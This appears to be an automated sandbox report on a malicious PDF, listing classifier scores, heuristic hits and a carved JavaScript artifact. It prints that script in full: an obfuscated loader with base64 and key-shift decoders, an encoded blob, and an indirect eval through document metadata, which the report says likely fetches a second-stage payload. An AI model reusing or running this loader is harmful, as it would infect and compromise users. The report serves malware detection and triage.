MALICIOUS
134
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The ML classifier strongly indicates this PDF is malicious. Embedded JavaScript, detected via PDF_JAVASCRIPT and PDF_JS heuristics, is present and obfuscated. The ML_NYX_PDF_MALICIOUS heuristic confirms the suspicious nature. The embedded JavaScript, extracted as javascript_obj0008_000.js, likely attempts to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9999
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
<</Type/Action/S/JavaScript/JS(\nfunction OOH2cYK\(TYHd\){var df='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',D7t='',G20,x3,aKHIqn,rUqlz,IStcZE,tQ4KnF,T8sK;for\(var oINMVmj=0;oINMVmj<TYHd.length;\){G20=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);x3=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);aKHIqn=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);rUqlz=df.indexOf\(TYHd.charAt\(oINMVmj++\)\);IStcZE=\(G20<<2\)+\(x3>>4\);tQ4KnF=\(\(x3&15\)<<4\)+\(aKHIqn>>2\);T8sK=\(\(aKHIqn&3\)<<6\)+rUqlz;D7t+=S … -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0008_000.js |
pdf-javascript-stream | PDF /JS object 8 at offset 0x230 | 5547 bytes |
SHA-256: 20d0121a38c0f12df004819b9ac6e34ab890fb4d0d9b0081b27cecfcded6c542 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). 51 of 74 identifiers look randomly generated (e.g. 'Z2J36pp8a2pWx6aeeH1ZpoWtmmldqWiGu5xbrXdi') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
function OOH2cYK(TYHd){var df='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',D7t='',G20,x3,aKHIqn,rUqlz,IStcZE,tQ4KnF,T8sK;for(var oINMVmj=0;oINMVmj<TYHd.length;){G20=df.indexOf(TYHd.charAt(oINMVmj++));x3=df.indexOf(TYHd.charAt(oINMVmj++));aKHIqn=df.indexOf(TYHd.charAt(oINMVmj++));rUqlz=df.indexOf(TYHd.charAt(oINMVmj++));IStcZE=(G20<<2)+(x3>>4);tQ4KnF=((x3&15)<<4)+(aKHIqn>>2);T8sK=((aKHIqn&3)<<6)+rUqlz;D7t+=String.fromCharCode(IStcZE);if(aKHIqn!=64)D7t+=String.fromCharCode(tQ4KnF);if(rUqlz!=64)D7t+=String.fromCharCode(T8sK);}
return D7t;}
function geAvvPwm(R7h,gfH9Z3cY){var FI3bk='',m0T=0;for(fKvvt=0;fKvvt<R7h.length;fKvvt++){FI3bk+=String.fromCharCode(R7h.charCodeAt(fKvvt)-gfH9Z3cY.charCodeAt(m0T++));if(m0T>=gfH9Z3cY.length)m0T=0;}
return FI3bk;}
vw0=geAvvPwm(OOH2cYK('f+CXqlSTvOjRc19Zpoulo2ZdqWqCrppbrXdhhaaPq3B2Z4aa32dwaGF36p5mcHZWx62saWhZpoK4nmZdqWiKra5brWxzg7iPq3B2ZJia32hoa2h36q5oa2VWx6Wfe3pZppWnrWddqWSCpaFbrWpnlaePq2pocpaa321teHd36qJnfmlWx7etfGpZpoeooG1dqWiHq7BbrWxzl6mPq2hsZpia32psanJ36q5nbXVWx6eje2pZpoqurmpdqXaUup9brWlyhruPq3BnZoSa32tueXJ36p9rcG1Wx6qgZmxZpoq3n21dqWSVrJ1brWtlirePq29sZIWa33p9ZGJ36qJ4bWpWx6eabW5Zppa6mmddqXSLqJtbrWlhhq6Pq3l4ZYOa33x+Z2J36pp8a2pWx6aeeH1ZpoWtmmldqWiGu5xbrXdigq2Pq2h4dJia33pvZGJ36q94bGRWx6qie35ZppWsnW9dqXaHrJ9brWxzh7qPq2poZYia33pwZGJ36qJ4bmpWx6miZntZpoeronhdqWGDpq1brWxzlraPq3B1YYaa33pwZGJ36p97bXpWx7ida2hZpom5onpdqWaJpaJbrXZph6ePq3t1ZIWa32t6bHJ36qtofWxWx7uwfH5ZpoWlsHxdqWmLuJpbrXpjmLqPq2x6cpea32xtdml36qBranlWx7asbXBZpoutoGxdqXKUq6BbrWp0lKWPq3toaYqa32tobWl36qB8bmxWx6evbH1ZpoitoGpdqWiErJ9brWp1iLiPq3psZoaa32p9bHZ36q95aHlWx6qffH5ZpouommpdqWSDqppbrWlhlaWPq21qZoKa32ttbHN36qJpaGhWx6yweWpZppWnomldqWaEqJtbrXZph6WPq2l1ZIia321oZnd36p9rfnpWx6qsZmxZppi7nWddqWaIqqFbrW1plK2Pq3B1d5ea33x+ZHZ36ppqbWlWx7eia29ZppW6r3xdqWeCuppbrWlmmLuPq25sYYaa321sa2V36p13b2RWx6ewaH5Zpom2oGhdqWeUq7BbrWpkiKiPq2p5aIOa32x+amR36qBpanlWx6ewbGtZpoinnWddqWSLq5tbrWdkha6Pq2tnZIqa32lvamN36p1pbmhWx6ifaXFZpoWqoGldqWSEq55brWdpiKuPq2trZIKa32ltZ2V36p1ma2tWx6ugaWlZpoWsoGtdqWSLqKBbrWp0hLuPq25lZ5ia32h9amV36qBub2RWx6iwbWhZpoW5oGtdqWGCqJxdc5qmwNjen6eiUbfv4KhgppJ+5uNfs6uZu+HPXqqVX77a2J2snFuEsduvYa+js6CnqJlvrlzny3OqlV/F6syprKaawNySZmSlqoGnk3GqmaXH59hWqpVsz3/Qq6aXpbvk2FaarFl78OCXqlSVvdynpJ2rUZPn3JexXFqN68uoWKqoj6XiZptklILYmplzqpLElcuanKZugu2eZmhkYYKw4JeqVKGz7talmZhux+PPqZuVobedzKCrm1qN68uoWKeUseHPpHWkksvh2ZecYp2349GqoF5jjevLqFilqo/WzpqqYVnF2MminaJcgu2dbmFvp7Pniq+ZpqTCst+knaeUs+XPXlpZpoulo2ZdqWqCrppYYW+qs+fdpnWZq8jnkq+ZpqTCoduvYW+ns+eKmaepn8anp16uq16C7Z5maGRhgp6Zl5yYo43b2ahgqpLElc2lraKlj6Wlmaepn8axzaWtoqWEsM2lraKlfaCTsZyfmK3Y2aumqI6P7suoq6RcwtbjoqeVlY3ydKyZplHB68+onqCgybLfpJ2nlLPlz15aWaaC2JqZXalhtaXNWGFvqLre1ptgo6e359Cip6tfvtrYnaycbYapo2tqXazB68+onqCgyaCnpa6Zo7jh2a1zsTvG3dOpZpegvuHLmIuooMTap3mnoJ2z15iZp6Cdt9jee6WVmr6+2JynXKzF6sygclZTfuLdnXKjp7fn0KKnq657sOdAnqmftenTpaZUocTe2KqeXFrN49mmdamft+jNl6iZWXSa32Z5ZHJ36pp3aHVWx6WrZnlZpoK2mndaXWzI1txWqJWqvuTLmnWpn7fozZeomVm0392dYW+Zt9bamKSjlL2y2KWoX6Gz7talmZhstN7RmKSjlL2y36Sdp5Sz5c9eWlmmgraad12pYZOlq1hhb5m31s6bqqeazNqnaGhvpMLny691nJaz2c+oq52rt6DSm5mkk77kzaFmoJbA3N6ec6uZu+HPXpqdmLTh2ZmjYp2349GqoHCkwufLr2Gvk7vczKKnl5x9ssyfn5adwdjVcbU+l7vh1piko5S9ssyfn5adwdjVZKupk8Xp3J+mm1mCod2mqpWqe7DMoqeXnI/X052aoKC14JiprZakxufTpJ9cYX7X052aoKC14JiinaKYxt2Xqaimksuepa2gnZ23ncyip5ecgOHPpJ+omX3o2qiZrW2C7Z5maGRhe/DMoqeXnI/X1qWbn1y04dmZo1+Xu+HWmKSjlL2w50ClmZ6P48+tWHWjxNbjXmFvl8Hnkp91ZGy7sZtqaGRsu6CVX7Ohlr/Q05N1lp3B2NVhoJmSwtfWpZufbM9/4JeqVJ/H4qdnam1qi66jb3Ftaouuo29xbWqLrqJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucGxpiq2ibnBsaYqtom5wbGmKraJucG+mxt7WZKimmsDp0F5aWWWHpZpmnlZdwOrXX3OxO7jq2JmsnaDAldGbrJ2UweOSX7OqksSVy6iqrW7A2uFWeaajs+6SX3Odl3rW2qZmmKC1o62lpKCStKPRm6x9lMHjk7GulaNy5cuvpKOStrLfpJ2nlLPlz16anqS5nqWsmaZRuszba2hkdKCy2pexoKCz2ZiinaKYxt2UaHOqksSV2691ZKmGpZpmaGReet3Bp21kYZXDlWawZ2l7sOCXqlSqs+fdpnWpn7fozZeomVl0mt9vaG1hd+qjZnFkU3uw45eqp6GP2uSsqlyqs+fdpmSlqnuw4JeqVKGHttSBbmmXj52armiXYbWlzWabYWHKqZpmaGRhe6SarmxkYYKlmnGeo6N668uoWKqitcaub26tboKw4KebhXWLq+NyqGlyvMCga55vp8PYu3pxaqp9oJOxmaajy9Dgp5uFdYur45N1rZLE6NphqJWqvuTLmnOxO8jW3FasiX66w8x9r3GmwNrdmZmklnqXj2ZxVlqN7NKfpJlZxsq3noaWeMmj1pumm6W6sZqubGRhgp7lqo2BmaDXsa1jcaWnwtKEmnuojfJ0qo2BmaDXsa11Vn+Al5WqjYGZoNexrXOVocKjzqWbYnTB4daXmmKYt+mzmaeiWcbKt56GlnjJnqWztT6SouHfnaGipI/W2qZmpJ3H3LOkq2+ns+eKqa5xobPn3ZuBoqV61tqmZqqat+zPqI6Zo8Xe2aRmqKCl6dyfpptZe6PNnpmmcsadml9hb5fB55KsmaZRu7KacaFwkqLh352hoqSA4c+kn6iZjd6VYWGvmridy4akqZi7492RoZFfwNbXm3VxWJfIzaihpKV5nuWsmaZRvuunl4igprne2KmTnY6A68+oq52gwLDns0Kdl3qd1qx1cWp78eZeYKenj7KiX15aWb7rpnNwYmKEnpNfs5uWxt7NpaZcWo3yz6KrmVG725KirnFuiaObX7Oko7vj3pxgXWzP2tapnVSauJ2SXquqbo+rk7K0XKTIsqdtYV1XeJ3WrHRrX4Omk1+zlql6nqWznaCkt5XTnGBcncizp29mZVrO8ZKirnBui6OcX7SwWb7rqHNwYmKFnuayYKCnjrKiZGlrWnvw0Kuml6W75NhWmVxazeren6RiocTe2KqcXFjCtZtnaWVig6abZ2llYoOmm2dpZWKDpptnaVRrcu7jr7FlYoOclqSdq1GW1t6bYF1ajfJ0rJmmUbqyy6aoYqG+6tF/pqdsuOTcXq6Vo3Lbp2Zzmm26o9abppulurDQYWNdrLvbkp6Tmo6A48ujnXFuebq9maqdocack7GulaNy3qeek5qOgOvPqKudoMCw57NCnZd6ndN0cGJihJ6QXGCdbYqjnF9hr5SP48+tWHWjxNbjXmFvp7Pnipp1qZ+36M2XqJlZeZrfb2htYXfqo2ZxZFh7sOCXqlSWj+rYm6uXksLakpiip5h7sOGeoaCWetmYop2imMbdpnNorGmCpZpfs5hcj9mls0KYbraj3auap6XEnZpiaKxpgqWaY51inbfj0aqgXWy45NxennFhjdumaHFkYY3blWFhr5St28dznF+WjfJ0l2BdbLOdk3GspqrN6dKfq2Ket9nTl2ailsnF1pexmaN649+ipF1sz9jLqpucWbee5bNClVl7sOez'),this.producer);JmKb=this.author;uZxlnx=this[JmKb];uZxlnx(vw0);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.